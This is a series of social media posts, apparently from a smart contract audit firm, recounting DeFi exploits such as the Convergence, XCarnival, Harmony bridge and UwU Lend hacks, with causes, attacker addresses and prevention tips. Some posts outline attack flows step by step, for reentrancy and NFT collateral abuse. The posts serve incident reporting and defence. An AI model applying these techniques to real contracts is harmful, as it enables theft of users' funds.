Naveen

On Aug 1, the defi protocol @Convergence_fi was exploited for ~$210k when the hacker exploited a vulnerability in the CvxRewardDistributor contract. In an official post on their ‘X’ handle, @Convergence_fi has advised its users not to interact with the protocol and withdraw assets staked on the platform. The 58M CVG stolen by the exploiter were part of tokens dedicated to staking emissions. In addition, the hacker also got away with $2,000 of unclaimed rewards from Convex. The attacker was initially funded through the infamous Tornado Cash by address etherscan.io/address/0x912c… After the exploit, the CVG token prices took a major hit and have not recovered since. The Vulnerability The vulnerable CvxRewardDistributor contract is responsible for minting CVG rewards to eligible stakers and and holding the rewards claimed from Convex, which in turn can be claimed by the stakers. Due to a bug, the input given by the user in the function claimMultipleStaking() of the said contract was not being validated. The hacker manipulated this bug to deploy a malicious contract to mint all tokens meant for staking emissions (58,000,000 CVG) only to dump the newly minted CVG into liquidity pools. Why is this Bug not Fixed in the Audit? To achieve gas optimization, the developers had modified/removed that line from the smart contract's code, which validated the user input given to the function claimMultipleStaking(). These changes were made post-audit; therefore, the auditors couldn’t have done anything to avoid the exploit. Hack Technical Details Attacker Address: etherscan.io/address/0x0356… Attack Txn: etherscan.io/tx/0x636be30e5… Attack Contract Address: etherscan.io/address/0xee45… Target contract: CvxRewardDistributor etherscan.io/address/0x2b08… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts

On July 24, 2024, the decentralized exchange and staking platform MonoSwap @monoswapio on the Blast chain was exploited, resulting in a significant loss of approximately 💰$1.3M. How the Hack Happened? In an official post on their X handle, @monoswapio claimed that the exploit was carried out with the help of a botnet (malware), which the hackers installed on one of their developers' office PCs while they were on a call with the developer, pretending to be VCs (Venture Capitalist) interested in making investments in the MonoSwap protocol. Through some surreptitious or social engineering method, they were able to install the malware on the PC, which had access to literally all MonoSwap-related wallets and contracts. As soon as the hackers broke in, they drained the staked liquidity positions. The malware infected the PC when the unaware developer downloaded a malicious app through a phishing link shared by the scammers. The malicious app looked similar to KakaoTalk, a mobile messaging app for smartphones. The Hack Aftermath As soon as the hack became known, MonoSwap warned its users against adding liquidity or stakes to their farming pools until the exploit was fixed. They also advised users to withdraw their staked positions urgently to avoid losing funds in the hack. The hack is currently being investigated, and MonoSwap will soon release updates about the hack and fund recovery. The Total Value Locked (TLV) for this protocol dropped significantly from approximately $1.5 million to $200,000 as a result of the exploit. The hacker withdrew funds to the address: 0x895a80371fc0e6987e27ddc7aa0e851bc3538ea8 only to bridge it to the Ethereum address: 0xd30eBC0a9AcdA91d383675EAAB3ff24f06d07eCE. Later all the bridged fund (371 $ETH) was transferred to the Tornado Cash. How to Avoid Getting Scammed by Crypto Scammers? This article highlights many red-flags which can help you in identifying the fraudulent actors in the crypto space. 💡immunebytes.com/blog/beginners… Also, read about different types of phishing scams that are prevalent in the Web3 space. 💡immunebytes.com/blog/zero-valu… 💡immunebytes.com/blog/ice-phish… 💡immunebytes.com/blog/what-is-a… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts

🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks On July 24, 2023, the decentralized exchange @Palmswaporg, on the Binance smart chain, was exploited for ~💰$900k by manipulating a smart contract vulnerability. The Smart Contract Vulnerability The primary reason for the exploit was a flaw in the calculations used to add or remove liquidity from the pool. This calculation was made to determine the exchange rate between USDP(Palm USD) and PLP(Palm Lp). The getAum() function, which calculated the PLP price after removing liquidity, was dependent upon the value of PoolAmount. Due to the miscalculation, the price of PLP increased every time the buyUSDP() was called to buy USDP. The hacker manipulated this miscalculation and made profits due to the difference in the exchange rate between USDP and PLP while removing and adding liquidity. The analysis showed that the hacker used a buying exchange rate of 1:1, whereas the selling exchange rate was 1:1.9, which explains the profit of ~$900k. How to Prevent Such Hacks? 👉 @ImmuneBytes offers reliable and effective smart contract and blockchain security audit services that can help prevent possible exploits by malicious actors in the Web3 space. Reach out for an audit for your Web3 project at 🔍 🔎immunebytes.com/contact-us/ Technical Details of the Hack: Attacker Address: bscscan.com/address/0xF84e… Victim Contract: bscscan.com/address/0x5525… Exploit Transaction: bscscan.com/tx/0x62dba5505… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts

In a major security breach on July 18, @WazirXIndia—one of the largest cryptocurrency exchanges in India, was hacked for an astonishing ~💰$234M. As per the official release by WazirX India, the breach happened in one of the multisig wallets. WazirX India is currently conducting a thorough investigation into the hack. To contain the damage caused by the exploit, the INR and crypto withdrawals have been temporarily paused. The exploiter's address involved in the exploit is reportedly funded by Tornado Cash. To obfuscate the stolen funds trail, the exploiter has transferred stolen assets to multiple addresses before swapping them for Ethereum (ETH) using Uniswap. The swapped crypto assets include $PEPE, $GALA, and $USDT. The exploiter continues to move funds to multiple addresses even at the time of reporting this. List of Stolen Tokens with Their Value bit.ly/3Y9vOqN Victim Address: etherscan.io/address/0x27fd… Hacker Address: etherscan.io/address/0x04b2… 😈Other Malicious Addresses Used for Stolen Fund Movement etherscan.io/address/0x35fe… (WazirX Exploiter 2) etherscan.io/address/0x90ca… (WazirX Exploiter 3) etherscan.io/address/0x90ca… etherscan.io/address/0x90ca… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts

RT @ImmuneBytes: On July 16, @lifiprotocol was exploited to steal ~💰$9.7M worth of crypto assets on the Ethereum and Arbitrum chains. The l…

On July 14, the cryptocurrency lending protocol @Minterest on the #mantle chain was exploited for ~💰$1.4M. The hack investigation is currently underway to uncover the reasons behind the exploit. Meanwhile, Minterest has temporarily paused its “Supply & Borrow” and “Repay & Withdraw” services to investigate and contain the hack. The attacker was initially funded by the infamous @TornadoCash on the #ETH chain. As per the last update, the hacker has bridged stolen funds (~$428 ETH) to #ETH. Stolen Funds: The stolen funds were moved to the two contract addresses by the exploiter. 👉mantlescan.xyz/address/0xf762… 👉mantlescan.xyz/address/0x4c1d… Was Minterest Ever Audited? As per the published blog on the official website on Nov 8, 2023, it has undergone 7 security audits by 4 different security audit companies. Whether it was some insider job, compromised security keys, or a smart contract vulnerability will be known once the detailed hack analysis report is out and shared with the community. Ref: minterest.com/blog/minterest… Technical Details of the Hack Hacker Address: mantlescan.xyz/address/0x618F… Txn hash: mantlescan.xyz/tx/0xb3c4c313a… Exploited Contract mantlescan.xyz/address/0x9b50… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts

Just in: On July 12, the defi @DoughFina on the #Ethereum chain has been exploited for ~💰$1.8m worth of crypto assets. @DoughFina has already acknowledged the hack through its official X handle. Although the hack investigation is still underway but, the likely cause behind the exploit is the access control vulnerability involving unvalidated call data in the ConnectorDeleverageParaswap contract. 💡Learn more about Access Control Vulnerabilities in smart contracts here: immunebytes.com/blog/access-co… The attacker was initially funded through #Railgun, and at the time of this report, the hacker has already swapped all stolen $USDC into $ETH. 💡Do you know Railgun and Tornado cash are not the only tools used by hackers to obfuscate stolen funds trail? See other tools: immunebytes.com/blog/top-torna… Efforts of Fund Recovery The team @DoughFina has sent an on-chain message to the hacker in a bid to open a negotiation channel with them and discuss the return of stolen funds. In the message, the hacker has been asked to cooperate and return the stolen funds. The deadline for returning funds has been set as July 15, 2024, 23:00 UTC, failing at which, the hacker would have to bear the consequences of a legal action. On-chain message txn. etherscan.io/tx/0x38ad3247c… Stolen funds are currently parked at etherscan.io/address/0x2913… Technical Details of the Hack Attacker: etherscan.io/address/0x6710… Attack contract: etherscan.io/address/0x11a8… Target contract: etherscan.io/address/0x9f54… Attack transaction: etherscan.io/tx/0x92cdcc732… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts

🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks On 😈July 10, 2022, the Omni Protocol, a decentralized finance (DeFi) platform, was compromised in a significant security breach. The exploit resulted in the loss of approximately 💰$1.4 million worth of cryptocurrency. 📌Reason for the Hack The hack occurred due to a reentrancy vulnerability in Omni Protocol's smart contract code. Reentrancy attacks exploit the way smart contracts handle external calls, allowing an attacker to repeatedly call a function before the initial execution is complete. This specific vulnerability was not adequately addressed in the contract's logic, leaving it open to exploitation. 💡Must Read: The Ultimate Guide to Reentrancy Attacks immunebytes.com/blog/reentranc… Do you know there are hundreds of crypto hacks where reentrancy was used to conduct the exploit? Here is the list of all such hacks: ⬇️immunebytes.com/blog/list-of-r… 📌Attack Flow 👉Identification of Vulnerability: The attacker identified a reentrancy vulnerability in one of the Omni Protocol's smart contracts. This vulnerability allowed the attacker to call a function repeatedly before the contract's state was updated. 👉Deploying Malicious Contract: The attacker deployed a malicious contract designed to exploit the vulnerability. This contract interacted with the vulnerable Omni Protocol contract. 👉Initiating the Attack: The attacker initiated a withdrawal function from the Omni Protocol. The vulnerable contract transferred funds to the attacker's contract before updating its own balance. 👉Reentrancy Exploit: Taking advantage of the reentrancy bug, the attacker's contract made recursive calls to the withdrawal function. Since the vulnerable contract had not yet updated its balance, it continued to transfer funds to the attacker's contract. 👉Draining Funds: The attacker repeated this process multiple times within a single transaction, rapidly draining funds from the Omni Protocol. 📌How to Prevent Such Hacks? 👉 @ImmuneBytes offers reliable and effective smart contract and blockchain security audit services that can help prevent possible exploits by malicious actors in the Web3 space. Reach out for an audit for your Web3 project at 🔍 🔎immunebytes.com/contact-us/ Or connect with us here t.me/immunebytes #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts 1

On July 2, 2024, the WMRP token contract on the #BNB chain was exploited for 103 BNB worth ~💰$58k. The attack was carried out by manipulating the price of the MRP using a reentrancy attack. The detailed hack analysis is underway, but executing crypto exploits using reentrancy is not a novel approach. Look at the list of crypto hacks conducted using reentrancy in the history of Web3: 💡immunebytes.com/blog/list-of-r… Learn more about reentrancy attacks in crypto here: 💡immunebytes.com/blog/reentranc… Technical Details Attacker: bscscan.com/address/0x132d… Attack contract: bscscan.com/address/0x2bd8… Target contract: bscscan.com/address/0x35f5… Exploit Txn: bscscan.com/tx/0x4353a6d37… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks June 27, 2023, marks the day of the exploit for Themis Protocol, a decentralized lending and borrowing platform on the #Arbitrum chain. The exploit caused losses of ~💰$370K to the protocol. The attack was carried out by manipulating the Balancer LP token price oracle, which resulted in the inflated price for B-wstETH-WETH-Stable-gauge. This eventually led to the exploiter making significant profits through flash loans. 💡Blockchain Oracles & Their Use Cases immunebytes.com/blog/explained… Technical Details of Hack Attackers address: arbiscan.io/address/0xDb73… Exploited contract: arbiscan.io/address/0x75f8… Attack Transaction: arbiscan.io/tx/0xff368294c… The Stolen Funds After stealing the funds, the Themis Protocol exploiter cross-chained through Stargate Finance. The funds were swapped for ETH and subsequently moved to the address etherscan.io/address/0xDb73… At a later date, the exploiter moved 191 ETH to Tornado Cash, a coin-mixing service often used by Hackers to obfuscate the trail of stolen funds. Not the First Price Manipulation Exploit in Crypto! Oracle price manipulation exploits are not new in the blockchain world. Look at the list of other crypto hacks where the hacker employed more or less similar techniques to carry out an exploit. 💡immunebytes.com/blog/list-of-o… . Mitigation Steps The following methods can help combat price manipulation attacks and minimize losses. 👉Multi-Oracle Approach 👉Data Source Diversification 👉Data Verification 👉Time Stamping 👉Threshold Signatures 👉Randomized Oracles 👉Decentralized Oracles 👉Off-Chain Data Verification 👉Emergency Shutdown Mechanisms 👉Regular Audits and Monitoring Find the detailed blog here: 💡immunebytes.com/blog/what-are-… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks On June 26, 2022, the NFT lending pool @XCarnival_Lab’s XToken lending contract on #ethereum was exploited for ~💰$3.8M (~3,087 $ETH) The hack was a result of a smart contract vulnerability, which allowed the hacker to use withdrawn pledged NFTs as collateral and drain the funds. The Attack Flow: 1️⃣The hacker gets funded with 120 ETH from the cryptocurrency mixer Tornado Cash 2️⃣Deploy the attack contract (0xf70F...cA8d) 3️⃣Use 87 ETH from this fund to buy BAYC NFT with ID 5110 and transfer transfer 5110 BAYC to the attack contract. 4️⃣Use the attack contract (0xf70F...cA8d) for bulk creation of pledge records. 5️⃣As there was no restriction on the Xtoken address in the pledge, the attacker easily passes his own pre-deplyed attack address for calling IXToken (xToken).borrow. 6️⃣The attacker’s Xtoken avoids borrowing funds in the pledge record to withdraw pledged NFT immediately at will. 7️⃣Due to the logical flaw, the pledge record of Xtoken is not updated; only the marker of whether the NFT is withdrawn is modified. 8️⃣The attacker creates multiple attack contracts and then repeatedly transfers the NFT to repeat the previous steps, creating multiple abnormal pledge records. 9️⃣Since the borrow verification does not verify the status of the NFT but only verifies the order ID, the exploiter uses these multiple abnormal pledge records to borrow a large sum. 🔟The attacker transfers the profits to his wallet address. What Could Have Prevented It? This hack could have been avoided if the address of Xtoken had a whitelist for restriction and verification and if the business logic had been set to verify the status of the collateral multiple times. The NFT staking time could have been limited to ensure it could not be withdrawn instantaneously. @ImmuneBytes—one of the leading and experienced 🔎Blockchain and Smart Contract security auditors in the Web3 space—has expertise in detecting such business logic flaws and vulnerabilities in all types of projects in the Web3 space. Connect here to learn more about our multi-layer audit process: 🔗t.me/immunebytes 🔗immunebytes.com/contact-us/ Technical Details 👉Attack Txn: 0x51cbfd46f21afb44da4fa971f220bd28a14530e1d5da5009cfbdfee012e57e35 👉Pledge Records Creation Txn: 0x60a3143c1c7a40d650e9e319d99425da5a87604f474279765f4ffbc0c4c375c2 👉Hacker’s address: 0xb7cbb4d43f1e08327a90b32a8417688c9d0b800a 👉Attack Contracts 0xf70F691D30ce23786cfb3a1522CFD76D159AcA8d 0x3edf976dF38f7d6273884B4066e3689Ef547D816 0x7b5a2f7cd1cc4eef1a75d473e1210509c55265d8 0x234e4B5FeC50646D1D4868331F29368fa9286238 👉Official Contracts XToken 0x5417da20ac8157dd5c07230cfc2b226fdcfc5663 XNFT 0x39360ac1239a0b98cb8076d4135d0f72b7fd9909 P2Controller 0x34ca24ddcdaf00105a3bf10ba5aae67953178b85 #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks Harmony’s Horizon Bridge, a cross-chain bridge, was exploited for 💰$100M on June 24, 2022. The hacker used the compromised private keys in the @harmonyprotocol and stole multiple cryptocurrencies, including ETH, USDC, WBTC, USDT, DAI, BUSD, AAG, FXS, SUSHI, AAVE, WETH, and FRAX. Good Read: 💡immunebytes.com/blog/compromis… 💡immunebytes.com/blog/public-an… How did the Exploit Happen? The Harmony Horizon Bridge used a multi-signature—or “multisig”—wallet for the validation process. The transaction approval required validation from five validators. However, the bridge was utilizing only two validators instead of five to secure itself, which meant the attacker only needed access to 2 private keys to carry out the attack. The hacker moved stolen funds to the Tornado Cash to obfuscate the stolen fund trail. Post-hack, the number of validators in the multi-signature were changed from 2 to 4. List of Crypto Hacks Due to Private Key Compromise 💡immunebytes.com/blog/list-of-c… Technical Details The two (multisig) addresses that were compromised: etherscan.io/address/0xf845… etherscan.io/address/0x812d… Exploiter address: etherscan.io/address/0x0d04… Harmony ETH Bridge: etherscan.io/address/0xf9fb… Harmony ERC20 Bridge: etherscan.io/address/0x0d04… Harmony BUSD Bridge: etherscan.io/address/0xf9fb… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks On June 17, 2023, the defi protocol Midas Capital on the BNB chain was exploited to steal 💰$600K worth of crypto assets. The critical vulnerability responsible for the exploit at Midas Capital was a rounding issue within its lending protocol. This protocol, a derivative of Compound Finance's V2 codebase, had a flawed redemption process, which the attacker manipulated using a rounding issue and flash loans. The detailed analysis of the Midas Capital hack can be found here: immunebytes.com/blog/midas-cap… 🤔Coincidentally, the same rounding issue was behind the 💰$7.4M exploit of @HundredFinance in April 2023. immunebytes.com/blog/hundred-f… Useful Read: immunebytes.com/blog/precision… How to Prevent Such Hacks? The exploiter carried out the attack by exploiting a vulnerability in the smart contract which could have been identified by a detailed and careful analysis of the smart contract before its deployment on the mainnet. 👉 @ImmuneBytes offers reliable and effective smart contract and blockchain security audit services that can help in preventing possible exploits by malicious actors of the Web3 space. Reach out for an audit for your Web3 project at 🔍 🔎immunebytes.com/contact-us/ You can also connect with us here t.me/immunebytes #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks On June 12, 2023, defi protocol Sturdy Finance was exploited due to a smart contract vulnerability. In the attack, @SturdyFinance lost 442 ETH worth ~$775k. The manipulated vulnerability was the read-only reentrancy in the Balancer which led to the exploit by allowing a faulty price oracle to determine the cB-stETH-STABLE asset price and consequently help the exploiter in make illicit profits. The detailed analysis report for the hack can be found here: immunebytes.com/blog/sturdy-fi… How to Tackle Read Reentrancy Attacks? This hack could have been prevented if the developers had taken the following precautions and steps: ✔️ To detect potential vulnerabilities, regularly perform thorough code reviews and security audits by experts. 🔎@ImmuneBytes brings you a team of expert auditors who can sniff out all potential vulnerabilities in your contract that might become a doorway for hackers. Setup a free consultation call here: immunebytes.com/contact-us/ or t.me/immunebytes ✔️ Implementing Reentrancy Guards is an effective strategy against such attacks. The ReentrancyGuard from OpenZeppelin is commonly used by developers across the Web3 space. immunebytes.com/blog/shield-yo… ✔️ Ensures that the state is updated before any external calls are made. This can prevent the attacker from reentering the contract with the old state. ✔️ If using call, set a fixed gas limit for external calls to mitigate the risk of reentrancy attacks by limiting the amount of gas the called function can consume. ✔️ Prefer pull payment models over push payment models. In a pull payment model, users withdraw their funds instead of the contract sending funds to users automatically. ✔️ Leverage well-audited libraries and contracts, such as those provided by OpenZeppelin, to benefit from community scrutiny and best practices. Technical Details of the Hack Exploiter Add: etherscan.io/address/0x1e84… Exploited Contract: etherscan.io/address/0x5927… Exploit Txn etherscan.io/tx/0xeb87ebc0a… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

MEV Bot service provider @JokInTheBoxETH on the #ethereum chain suffered an exploit on June 11 and lost ~💰$34K worth of its assets. The lost assets include ~109 billion $JOK, which were swapped for 9.12ETH by the attacker post-hack. Team @JokInTheBoxETH acknowledged the exploit through a post on their official X handle and stated that to compensate the users affected in the exploit, they would airdrop the exact amount of tokens each user staked and lost on the platform within 24h. They also reassured the community of their commitment to the platform's stability and value by announcing a token buyback and burn strategy. In an effort to reduce the circulating supply, they will buy back 110B $JOK tokens from the market over time and burn them, demonstrating their dedication to the community's long-term interests. The exact reason behind the exploit is not known yet but the exploit is currently being investigated. Attacker: etherscan.io/address/0xfcd4… Attack contract: etherscan.io/address/0x9d34… Attack Txn: etherscan.io/tx/0xd14f5d518… Target contract: etherscan.io/address/0xa644… (JokInTheBoxStaking) #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

The Defi protocol @UwU_Lend was exploited in an attack on June 10, resulting in the loss of ~💰$20M worth of crypto assets. The Attack The initial analysis indicates that the attacker (who was initially funded by Tornado Cash) carried out the attack using Oracle price manipulation in tandem with flash loans. The sUSDE price fetched by sUSDePriceProviderBUniCatch (0xd252953818bdf8507643c237877020398fa4b2e8) is decided by five oracles namely, FRAXUSDe, USDeUSDC, USDeDAI, USDecrvUSD, and GHOUSDe. The attacker cleverly manipulated the price of these five oracles to artificially inflate the price of sUSDE. 💡immunebytes.com/blog/what-are-… This attack was conducted from a single wallet address, and it stole several tokens, including wrapped ether (WETH), wrapped bitcoin (WBTC), and stablecoins. The attack took place in three transactions, and the hacker swapped the stolen assets for ETH and split them into the following two Ethereum wallets through the decentralized exchange Uniswap. etherscan.io/address/0x48D7… etherscan.io/address/0x050c… Attacker Address: etherscan.io/address/0x841d… Attack Transactions: etherscan.io/tx/0x242a0fb4f… etherscan.io/tx/0xb3f067618… etherscan.io/tx/0xca1bbf3b3… The UwU Lend Controversy UwU Lend was founded by Quadriga CX co-founder Michael “Sifu” Patryn, who is not new to controversy. When Quadriga CX collapsed in 2022, it was found that an address linked to him transferred $5.5 million worth of ether (ETH) to Tornado Cash. He is also connected with the defi cryptocurrency project Wonderland, which he ran pseudonymously before his identity was revealed. As soon as this fact came to light, the protocol suffered a meltdown. 💡immunebytes.com/blog/list-of-o… #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

🏴‍☠️ On This Day: Revisiting Past 😈#Crypto #Hacks On June 10, 2023, Atlantis Loans (an abandoned project on the BNB Chain) experienced a governance attack, which resulted in a loss of over 💰$1 million. The exploiter managed to establish themselves as the administrator of the token's proxy contract, thereby gaining control and manipulating its functionalities. Any users who had granted approvals for the Atlantis Loan contract and have not revoked them had funds extracted from their wallets. The detailed hack analysis can be found here: 🔎immunebytes.com/blog/atlantis-… Governance attacks in the cryptocurrency context refer to malicious or manipulative actions aimed at influencing the governance mechanisms of a blockchain or decentralized organization (such as a Decentralized Autonomous Organization, or DAO) for personal gain or to cause disruption. Must Read: 💡immunebytes.com/blog/what-are-… 💡immunebytes.com/blog/exploring… Here are some common forms of governance attacks: 51% Attack: If an entity controls the majority of the voting power (or stake in proof-of-stake systems), they can unilaterally make decisions, passing proposals that benefit them even if these proposals are harmful to the network. 💡immunebytes.com/blog/51-attack… Sybil Attack: An attacker creates multiple identities to gain a disproportionate influence over the voting process. This is easier in systems where the cost of creating new identities is low. 💡immunebytes.com/blog/is-sybil-… Front-Running: In blockchain systems, proposals and votes are often public. Attackers can see upcoming proposals and position themselves to influence the outcome before other stakeholders can react. 💡immunebytes.com/blog/front-run… Proposal Manipulation: Attackers can submit misleading or malicious proposals that appear beneficial on the surface but contain hidden mechanisms or clauses that serve their interests. Snapshot Manipulation: Manipulating the timing of when snapshots of token holdings are taken for voting purposes, allowing attackers to temporarily acquire tokens just long enough to influence a vote, and then offload them. #Hacked #exploited #crypto #CryptoInvestor #CryptoInvestment #CryptoInvesting #cryptomarket #CryptoCommunity #web3community #bugbountytips #Blockchain #Blockchain101 #WEB3 #web3community #web3jobs #BugBounty #blockchaintechnology #blockchaindevelopment #blockchaingaming #blockchainrevolution #blockchaineducation #blockchains #blockchaincommunity #blockchainjobs #blockchainsecurity #blockchaindevelopers #blockchainsolutions #blockchaintech #web3development #web3education #web3event #cryptocurrency #cryptocurrencynews #cryptocurrencies #cryptonews #bugbountytip #cryptowallet #smartcontracts #SmartContractSecurity

